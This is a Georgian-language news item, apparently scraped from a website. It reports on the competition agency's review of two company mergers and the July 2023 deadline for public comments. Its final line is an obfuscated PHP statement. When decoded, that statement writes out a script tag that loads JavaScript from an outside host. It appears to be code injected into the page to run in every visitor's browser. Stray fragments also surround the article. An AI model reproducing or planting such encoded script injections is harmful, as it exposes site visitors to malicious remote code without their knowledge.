celsiusi
ავერსი საქკაბელი

საქართველოს კონკურენციის ეროვნულმა სააგენტომ ეკონომიკური აგენტების კონცენტრაციის (გაერთიანება) 2 საქმესთან დაკავშირებით ადმინისტრაციული წარმოება დაიწყო. საკითხი ეხება - დეველოპერულ ბაზარზე, „ანაგი დეველოპმენტ 2“-ის და „თეთრი კვადრატი ისანში“ გაერთიანებას და სწრაფი მოხმარების პროდუქტების (“FMCG”) ბაზარზე, „დიპლომატ ჯორჯიასა“ და “კანტს“ შორის კონცენტრაციას.

"მიმდინარე ადმინისტრაციული წარმოების ფარგლებში, სააგენტო სწავლობს განსახორციელებელი კონცენტრაციის კონკურენტულ გარემოსთან თავსებადობის საკითხს.

მოქმედი კანონმდებლობის შესაბამისად, აღნიშნული კომპანიების გაერთიანებასთან დაკავშირებით დაინტერესებულ პირებს, მოსაზრებების წარმოდგენის შესაძლებლობა აქვთ - არაუგვიანეს, 2023 წლის 28 ივლისისა, სააგენტოს ელ. ფოსტაზე: ელ-ფოსტის ეს მისამართი დაცულია სპამ-ბოტებისგან. ნახვისთვის უნდა გქონდეთ ჩართული JavaScript. ან მისამართზე - ქ. თბილისი, დავით აღმაშენებლის გამზირი N154, მე-8 სართული.

ინფორმაციისთვის: წინასწარ შეტყობინებას დაქვემდებარებული კონცენტრაციის განხორციელება დასაშვებია მხოლოდ მისი კონკურენტულ გარემოსთან თავსებადობის შესახებ სააგენტოს გადაწყვეტილების საფუძველზე.

კომპანიების შერწყმის (კონცენტრაციის) შესახებ კონკურენციის ეროვნული სააგენტო ინფორმირებული უნდა იყოს იმ შემთხვევაში, თუ კომპანიების ერთობლივი (ჯამური) წლიური ბრუნვა, საქართველოს ტერიტორიაზე, წინა ფინანსური წლის მდგომარეობით, 20 მილიონ ლარს აღემატება, ხოლო თითოეული კომპანიის წლიური ბრუნვა 5 მილიონ ლარზე მეტია.

2023 წლის 6 თვეში, საქართველოში რეგისტრირებული 12 119 კომპანიის კონცენტრაცია იქნა გადამოწმებული. სააგენტომ 3 კონცენტრაციაზე თანხმობა გასცა", - ნათქვამია კონკურენციის სააგენტოს ინფორმაციაში.  

319
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");